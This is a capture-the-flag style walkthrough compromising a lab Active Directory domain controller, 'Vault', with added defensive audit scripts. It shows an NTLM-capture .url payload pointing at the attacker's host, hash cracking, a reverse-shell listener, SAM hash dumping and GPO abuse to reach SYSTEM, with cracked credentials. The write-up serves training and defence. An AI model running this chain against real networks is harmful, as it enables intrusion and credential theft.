Vault
Network
- IP Target: 192.168.150.172
Enumeration
| PORT | SERVICE | VERSION | DESCRIPTION |
|---|---|---|---|
| 53/tcp | domain | Simple DNS Plus | DNS |
| 88/tcp | kerberos-sec | Microsoft Windows Kerberos | KERBEROS |
| 135/tcp | msrpc | Microsoft Windows RPC | MSRPC |
| 389/tcp | ldap | Microsoft Windows Active Directory LDAP | LDAP |
| 445/tcp | microsoft-ds? | - | SMB |
| 464/tcp | kpasswd5? | - | - |
| 593/tcp | ncacn_http | Microsoft Windows RPC over HTTP 1.0 | MSRPC |
| 636/tcp | tcpwrapped | - | LDAP |
| 3268/tcp | ldap | Microsoft Windows Active Directory LDAP | LDAP |
| 3269/tcp | tcpwrapped | - | LDAP |
| 3389/tcp | ms-wbt-server | Microsoft Terminal Services | RDP |
| 5985/tcp | http | HTTPAPI httpd 2.0 | - |
| 9389/tcp | mc-nmf | .NET Message Framing | - |
| 49666/tcp | msrpc | Microsoft Windows RPC | - |
| 49668/tcp | msrpc | Microsoft Windows RPC | - |
| 49675/tcp | ncacn_http | Microsoft Windows RPC over HTTP 1.0 | - |
| 49676/tcp | msrpc | Microsoft Windows RPC | - |
| 49708/tcp | msrpc | Microsoft Windows RPC | - |
| 49820/tcp | msrpc | Microsoft Windows RPC | - |
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.150.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 10:54 CET
Nmap scan report for 192.168.150.172
Host is up (0.063s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49668/tcp open unknown
49675/tcp open unknown
49676/tcp open unknown
49708/tcp open unknown
49820/tcp open unknown
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo nmap -Pn -sC -sV -p53,88,135,389,445,464,593,636,3268,3269,3389,5985,9389,49666,49668,49675,49676,49708,49820 -oN alltcp.txt 192.168.150.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 11:03 CET
Nmap scan report for 192.168.150.172
Host is up (0.067s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-18 10:03:19Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vault.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: VAULT
| NetBIOS_Domain_Name: VAULT
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: vault.offsec
| DNS_Computer_Name: DC.vault.offsec
| DNS_Tree_Name: vault.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2024-12-18T10:04:08+00:00
|_ssl-date: 2024-12-18T10:04:48+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC.vault.offsec
| Not valid before: 2024-08-01T02:09:28
|_Not valid after: 2025-01-31T02:09:28
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
49820/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-18T10:04:12
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.41 seconds
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo nmap -Pn -sU -sV -sC --top-ports=20 -oN top_20_udp_nmap.txt 192.168.150.172
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-18 12:10 CET
Nmap scan report for vault.offsec (192.168.150.172)
Host is up (0.073s latency).
PORT STATE SERVICE VERSION
53/udp open domain Simple DNS Plus
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open ntp NTP v3
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 368.78 seconds
smb
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ smbclient --no-pass -L //192.168.150.172
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DocumentsShare Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.150.172 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo hydra -L /usr/share/seclists/Usernames/Names/names.txt -P /home/momphucker/Desktop/offsec_/machines/Thor/rockyou.txt 192.168.150.172 smb -t 1
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-18 12:57:36
[DATA] max 1 task per 1 server, overall 1 task, 145982948623 login tries (l:10177/p:14344399), ~145982948623 tries per task
[DATA] attacking smb://192.168.150.172:445/
[ERROR] invalid reply from target smb://192.168.150.172:445/
kerberos
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='vault' 192.168.150.172
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 10:44 CET
Nmap scan report for vault.offsec (192.168.150.172)
Host is up (0.065s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| guest@vault
|_ administrator@vault
Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
Exploit
On checking, the Guest user with an empty password can read and write to the DocumentsShare share.
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ crackmapexec smb 192.168.150.172 -u 'Guest' -p '' --shares #Null user
SMB 192.168.150.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB 192.168.150.172 445 DC [+] vault.offsec\Guest:
SMB 192.168.150.172 445 DC [+] Enumerated shares
SMB 192.168.150.172 445 DC Share Permissions Remark
SMB 192.168.150.172 445 DC ----- ----------- ------
SMB 192.168.150.172 445 DC ADMIN$ Remote Admin
SMB 192.168.150.172 445 DC C$ Default share
SMB 192.168.150.172 445 DC DocumentsShare READ,WRITE
SMB 192.168.150.172 445 DC IPC$ READ Remote IPC
SMB 192.168.150.172 445 DC NETLOGON Logon server share
SMB 192.168.150.172 445 DC SYSVOL Logon server share
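The share listing above is the finding that drives the rest of the chain: a share a guest session can write to. As an added example (not part of the original write-up), the following script parses crackmapexec `--shares` output in the format shown and reports every share the session has WRITE on, so the same check can be run over a whole fleet of hosts. The sample output is constructed from the listing above.

```python
"""Flag SMB shares that a guest/null session can write to.

Parses the share table crackmapexec prints after `--shares` and returns the
shares carrying WRITE, which is where dropped shortcut files end up.
"""
import re

# Constructed from the crackmapexec output above (Guest with an empty password).
SAMPLE_OUTPUT = r"""
SMB 192.168.150.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB 192.168.150.172 445 DC [+] vault.offsec\Guest:
SMB 192.168.150.172 445 DC [+] Enumerated shares
SMB 192.168.150.172 445 DC Share Permissions Remark
SMB 192.168.150.172 445 DC ----- ----------- ------
SMB 192.168.150.172 445 DC ADMIN$ Remote Admin
SMB 192.168.150.172 445 DC C$ Default share
SMB 192.168.150.172 445 DC DocumentsShare READ,WRITE
SMB 192.168.150.172 445 DC IPC$ READ Remote IPC
SMB 192.168.150.172 445 DC NETLOGON Logon server share
SMB 192.168.150.172 445 DC SYSVOL Logon server share
"""

# One table row: "SMB <host> <port> <name> <share> [perms] [remark]".
# The permissions column is empty when the session has no access at all.
SHARE_RE = re.compile(
    r"^SMB\s+(?P<host>\S+)\s+\d+\s+\S+\s+"
    r"(?P<share>\S+)"
    r"(?:\s+(?P<perms>READ,WRITE|WRITE,READ|READ|WRITE))?"
    r"(?:\s+(?P<remark>.*))?$"
)


def parse_shares(output):
    """Return a list of {host, share, perms, remark} dicts, one per share row."""
    shares = []
    for line in output.splitlines():
        m = SHARE_RE.match(line.strip())
        if not m:
            continue
        name = m.group("share")
        # Skip status lines ("[*]", "[+]"), the header row and its underline.
        if name == "Share" or name.startswith(("[", "-")):
            continue
        perms = set((m.group("perms") or "").split(",")) - {""}
        shares.append({
            "host": m.group("host"),
            "share": name,
            "perms": perms,
            "remark": (m.group("remark") or "").strip(),
        })
    return shares


def writable_shares(shares):
    """Shares the enumerating session can write to, sorted by name."""
    return sorted(s["share"] for s in shares if "WRITE" in s["perms"])


if __name__ == "__main__":
    parsed = parse_shares(SAMPLE_OUTPUT)
    for share in writable_shares(parsed):
        print(f"writable by this session: {share}")
```

Any share reported here for a Guest or null session is a drop point for files that make other users' machines authenticate elsewhere, so it is worth reviewing the share ACL and whether the Guest account needs to be enabled at all.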
At this point I try to use Responder, following this source.
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ sudo responder -I tun0 -v
I create a file with the .url extension, for example payload.url, with the following content:
[InternetShortcut]
URL=anyurl
WorkingDirectory=anydir
IconFile=\\x.x.x.x\%USERNAME%.icon
IconIndex=1
I replace x.x.x.x with the IP of my Kali machine:
[InternetShortcut]
URL=anyurl
WorkingDirectory=anydir
IconFile=\\192.168.45.172\%USERNAME%.icon
IconIndex=1
Finally I upload the file via SMB:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ smbclient -U 'vault\Guest' //192.168.150.172/DocumentsShare
Password for [VAULT\Guest]:
Try "help" to get a list of possible commands.
smb: \> put payload.url
Responder captures the request for the payload:
[SMB] NTLMv2-SSP Client : 192.168.150.172
[SMB] NTLMv2-SSP Username : VAULT\anirudh
[SMB] NTLMv2-SSP Hash : anirudh::VAULT:30a42726c2c524ed...
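The capture works because Explorer resolves the `IconFile` UNC path of any .url file it renders, so a user merely browsing the share authenticates to the host named in it. As an added example (not part of the original write-up), the script below walks a share directory and flags .url files whose `IconFile`, `URL` or `WorkingDirectory` points at a UNC host outside an allow-list; the sample share it builds is constructed and contains one benign shortcut and one shaped like the payload.url above. The allow-list host `DC.vault.offsec` is taken from the nmap output; everything else is an assumption.

```python
"""Scan a share directory for .url shortcuts whose icon or target is a UNC path."""
import configparser
import os
import re
import tempfile
from dataclasses import dataclass

# [InternetShortcut] keys that Explorer resolves when it renders the file;
# a UNC value here makes the viewing client open an SMB session to that host.
WATCHED_KEYS = ("iconfile", "url", "workingdirectory")
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")


@dataclass
class Finding:
    path: str
    key: str
    value: str
    host: str


def parse_url_file(path):
    """Return the [InternetShortcut] section as a dict with lower-cased keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    with open(path, encoding="utf-8", errors="replace") as fh:
        cp.read_file(fh)
    if not cp.has_section("InternetShortcut"):
        return {}
    return dict(cp.items("InternetShortcut"))


def audit_share(root, trusted_hosts=()):
    """Walk root and report .url files pointing at hosts outside trusted_hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".url"):
                continue
            full = os.path.join(dirpath, name)
            try:
                fields = parse_url_file(full)
            except (configparser.Error, OSError):
                continue  # unreadable or not INI-shaped: Explorer resolves nothing
            for key in WATCHED_KEYS:
                value = fields.get(key, "")
                m = UNC_RE.match(value)
                if m and m.group(1).lower() not in trusted:
                    findings.append(Finding(full, key, value, m.group(1)))
    return findings


def build_sample_share():
    """Constructed sample: one benign shortcut and one shaped like the page's payload.url."""
    root = tempfile.mkdtemp(prefix="documentsshare_")
    with open(os.path.join(root, "intranet.url"), "w") as fh:
        fh.write("[InternetShortcut]\nURL=https://intranet.example.local/\nIconIndex=0\n")
    with open(os.path.join(root, "payload.url"), "w") as fh:
        fh.write("[InternetShortcut]\nURL=anyurl\nWorkingDirectory=anydir\n"
                 "IconFile=\\\\192.168.45.172\\%USERNAME%.icon\nIconIndex=1\n")
    return root


if __name__ == "__main__":
    for f in audit_share(build_sample_share(), trusted_hosts=["DC.vault.offsec"]):
        print(f"{f.path}: {f.key}={f.value} -> untrusted host {f.host}")
```

Run it against the mounted share (or a SYSVOL/NETLOGON copy) on a schedule; a hit on a share that guests can write to, like DocumentsShare here, is exactly the condition this write-up exploits. Restricting outbound SMB (TCP 445) at the perimeter removes the capture path even when such a file is planted.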
The user anirudh is thus found, together with their NTLMv2-SSP hash. I proceed to crack the hash:
hashcat -m 5600 creds /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
And the result is SecureHM:
ANIRUDH::VAULT:8e79710dbe0aa60c:850d3a26af75ff29b08e9f341820ee22:...:SecureHM
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: ANIRUDH::VAULT:8e79710dbe0aa60c:850d3a26af75ff29b08...000000
Time.Started.....: Thu Dec 19 12:25:56 2024, (4 mins, 46 secs)
Time.Estimated...: Thu Dec 19 12:30:42 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2827.3 kH/s (6.54ms) @ Accel:64 Loops:38 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 816874752/1104517645 (73.96%)
Rejected.........: 0/816874752 (0.00%)
Restore.Point....: 10608384/14344385 (73.95%)
Restore.Sub.#1...: Salt:0 Amplifier:0-38 Iteration:0-38
Candidate.Engine.: Device Generator
Candidates.#1....: Sempakata -> Searsto123
Hardware.Mon.#1..: Temp: 51c Util: 86%
Credentials found:
anirudh:SecureHM
The user has no RDP access, but seems to have access to the other SMB shares:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ crackmapexec smb 192.168.150.172 -u 'anirudh' -p 'SecureHM' --shares
SMB 192.168.150.172 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:vault.offsec) (signing:True) (SMBv1:False)
SMB 192.168.150.172 445 DC [+] vault.offsec\anirudh:SecureHM
SMB 192.168.150.172 445 DC [+] Enumerated shares
SMB 192.168.150.172 445 DC Share Permissions Remark
SMB 192.168.150.172 445 DC ----- ----------- ------
SMB 192.168.150.172 445 DC ADMIN$ READ Remote Admin
SMB 192.168.150.172 445 DC C$ READ,WRITE Default share
SMB 192.168.150.172 445 DC DocumentsShare
SMB 192.168.150.172 445 DC IPC$ READ Remote IPC
SMB 192.168.150.172 445 DC NETLOGON READ Logon server share
SMB 192.168.150.172 445 DC SYSVOL READ Logon server share
Evil-winrm
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ evil-winrm -u anirudh -p 'SecureHM' -i 192.168.150.172
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\anirudh\Documents> powershell -e ...
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.172] from (UNKNOWN) [192.168.150.172] 49763
PS C:\Users\anirudh\Documents>
Privilege Escalation
PS C:\users\anirudh\desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
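SeBackupPrivilege and SeRestorePrivilege are the two entries in this listing that matter: together they let the holder read and write any file regardless of its ACL, which on a domain controller includes the SAM and SYSTEM hives. On a DC these privileges normally arrive through membership in Backup Operators or Server Operators, so an ordinary user holding them is a delegation finding. As an added example (not part of the original write-up), the script below parses `whoami /priv` output in the format above and flags the privileges that allow this kind of escalation; the sample text is constructed from the listing shown, and the risk table is my own.

```python
"""Parse `whoami /priv` output and flag privileges that bypass file or process ACLs."""
import re

# Constructed from the listing above (anirudh's token on the DC).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== =======
SeMachineAccountPrivilege     Add workstations to domain           Enabled
SeSystemtimePrivilege         Change the system time               Enabled
SeBackupPrivilege             Back up files and directories        Enabled
SeRestorePrivilege            Restore files and directories        Enabled
SeShutdownPrivilege           Shut down the system                 Enabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system  Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Enabled
SeTimeZonePrivilege           Change the time zone                 Enabled
"""

# Privileges whose holder can read or replace protected files, impersonate
# other principals, or run code in the kernel. For a plain domain user each
# one is a finding regardless of the rest of the token.
HIGH_RISK = {
    "SeBackupPrivilege": "read any file regardless of ACL (SAM/SYSTEM hives, NTDS.dit)",
    "SeRestorePrivilege": "write any file regardless of ACL (ACLs, service binaries)",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then grant itself access",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate tokens of other logged-on principals",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary access tokens",
}

# One table row: privilege name, free-text description, Enabled/Disabled.
# Works for both the column-padded original and single-spaced copies of it.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} from the tabular output."""
    privs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def risky_privileges(privs):
    """Return [(name, state, why)] for every HIGH_RISK privilege in the token.

    A privilege that is present but Disabled still counts: the holder can
    enable it at will (AdjustTokenPrivileges), so presence is what matters.
    """
    return [(name, state, HIGH_RISK[name])
            for name, state in privs.items() if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, why in risky_privileges(parse_whoami_priv(SAMPLE_WHOAMI_PRIV)):
        print(f"{name} ({state}): {why}")
```

The same parser can be pointed at `whoami /priv` output collected from a fleet by a logon script or an EDR query; any non-administrative account that comes back with SeBackupPrivilege or SeRestorePrivilege should have its group memberships reviewed.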
I exploit the SeBackupPrivilege privilege with the Acl-FullControl.ps1 module:
PS C:\Users\anirudh\desktop> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\anirudh\desktop>
PS C:\Users\anirudh\desktop> Import-Module Acl-FullControl.ps1
PS C:\Users\anirudh\desktop> Acl-FullControl -user vault\anirudh -path c:\users\Administrator
This gives access to Administrator's files.
I download sam and system via Evil-WinRM:
*Evil-WinRM* PS C:\Temp> download sam
Info: Downloading C:\Temp\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Temp> download system
Info: Downloading C:\Temp\system to system
Info: Download successful!
Using pypykatz I recover the users' hashes:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ pypykatz registry --sam sam system
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: e9a15188a6ad2d20d26fe2bc984b369e
============== SAM hive secrets ==============
HBoot Key: 708ec1c889bbb66d2c1e557b558ac97f10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:608339ddc8f434ac21945e026887dc36:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
At this point all that would remain is to connect with a pass-the-hash as Administrator, but no technique succeeds!
I reconnect with Evil-WinRM as the user anirudh and check the domain policies with Get-NetGPO; for this I need PowerView.
I upload it and run it:
C:\Users\anirudh\Documents\wintools>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\anirudh\Documents\wintools> Import-Module PowerView.ps1
PS C:\Users\anirudh\Documents\wintools> Get-NetGPO
flags : 0
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 11/19/2021 9:00:32 AM
versionnumber : 4
systemflags : -1946157056
objectguid : 93130581-3375-49c7-88d3-afdc915a9526
showinadvancedviewonly : True
usnchanged : 12778
dscorepropagationdata : {11/19/2021 9:00:32 AM, 11/19/2021 8:51:14 AM, 1/1/1601 12:00:00 AM}
displayname : Default Domain Policy
gpcfunctionalityversion : 2
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
usncreated : 5672
whencreated : 11/19/2021 8:50:33 AM
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec
flags : 0
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 11/19/2021 8:50:33 AM
versionnumber : 1
systemflags : -1946157056
objectguid : 0ccc30ba-3bef-43ac-9c61-ebb814e9a685
showinadvancedviewonly : True
usnchanged : 5675
dscorepropagationdata : {11/19/2021 8:51:14 AM, 1/1/1601 12:00:00 AM}
displayname : Default Domain Controllers Policy
gpcfunctionalityversion : 2
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vault.offsec\sysvol\vault.offsec\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
usncreated : 5675
whencreated : 11/19/2021 8:50:33 AM
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vault,DC=offsec
I check the first policy:
PS C:\Users\anirudh\Documents\wintools> Get-GPPermission -Guid 31B2F340-016D-11D2-945F-00C04FB984F9 -TargetType User -TargetName anirudh
Trustee : anirudh
TrusteeType : User
Permission : GpoEditDeleteModifySecurity
Inherited : False
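The root cause here is not the privilege on the token but the GPO ACL: a plain user holds GpoEditDeleteModifySecurity on the Default Domain Policy, which applies to every computer in the domain. As an added example (not part of the original write-up), the script below parses Get-GPPermission records in the format above and reports every trustee with edit-level rights that is not in an expected set of editors; the sample records are constructed (the anirudh one mirrors the output shown), and the baseline of expected editors is an assumption to adapt to the environment's delegation model.

```python
"""Audit Get-GPPermission records for GPO edit rights held by unexpected trustees."""
import re

# Constructed sample in the shape Get-GPPermission prints one record per
# trustee; the anirudh record mirrors the real output shown above.
SAMPLE_GPPERMISSION = """\
Trustee     : Domain Admins
TrusteeType : Group
Permission  : GpoEditDeleteModifySecurity
Inherited   : False

Trustee     : Authenticated Users
TrusteeType : WellKnownGroup
Permission  : GpoApply
Inherited   : False

Trustee     : anirudh
TrusteeType : User
Permission  : GpoEditDeleteModifySecurity
Inherited   : False
"""

# Permission levels that let the trustee change what the GPO does. GpoCustom
# means a non-standard ACE and is treated as needing review.
EDIT_LEVELS = {"GpoEdit", "GpoEditDeleteModifySecurity", "GpoCustom"}

# Assumed baseline: principals expected to hold edit rights on the default
# domain policies. Extend with any group the environment delegates to.
EXPECTED_EDITORS = {"Domain Admins", "Enterprise Admins", "SYSTEM"}

FIELD_RE = re.compile(r"^(Trustee|TrusteeType|Permission|Inherited)\s*:\s*(.*)$")


def parse_gppermission(text):
    """Split the key : value output into a list of per-trustee dicts."""
    records, current = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if not m:
            # Blank line (or anything unrecognised) terminates the record.
            if current:
                records.append(current)
                current = {}
            continue
        current[m.group(1)] = m.group(2).strip()
    if current:
        records.append(current)
    return records


def unexpected_editors(records, expected=EXPECTED_EDITORS):
    """Trustees holding edit-level permission that are not in the baseline."""
    return [r["Trustee"] for r in records
            if r.get("Permission") in EDIT_LEVELS and r.get("Trustee") not in expected]


if __name__ == "__main__":
    for trustee in unexpected_editors(parse_gppermission(SAMPLE_GPPERMISSION)):
        print(f"unexpected GPO editor: {trustee}")
```

Feed it the output of `Get-GPPermission -All` for each GPO (the Default Domain Policy and Default Domain Controllers Policy first) and treat every name it returns as a delegation to justify or remove. Changes to a GPO's ACL can also be alerted on via directory service object modification auditing on the groupPolicyContainer objects.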
And it appears to be modifiable. To do so I need the SharpGPOAbuse tool.
I upload it to the target machine and run it like this to add the user I control, anirudh, to the Administrators group:
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
And I make it effective with:
At this point I connect with impacket-psexec to access the machine with the new privileges:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Vault]
└─$ impacket-psexec vault.offsec/anirudh:SecureHM@192.168.150.172
Impacket v0.12.0.dev1+20240426.161331.37cc8f95 - Copyright 2023 Fortra
[*] Requesting shares on 192.168.150.172.....
[*] Found writable share ADMIN$
[*] Uploading file msnsAnuK.exe
[*] Opening SVCManager on 192.168.150.172.....
[*] Creating service zNov on 192.168.150.172.....
[*] Starting service zNov.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
All that remains is to retrieve the flags: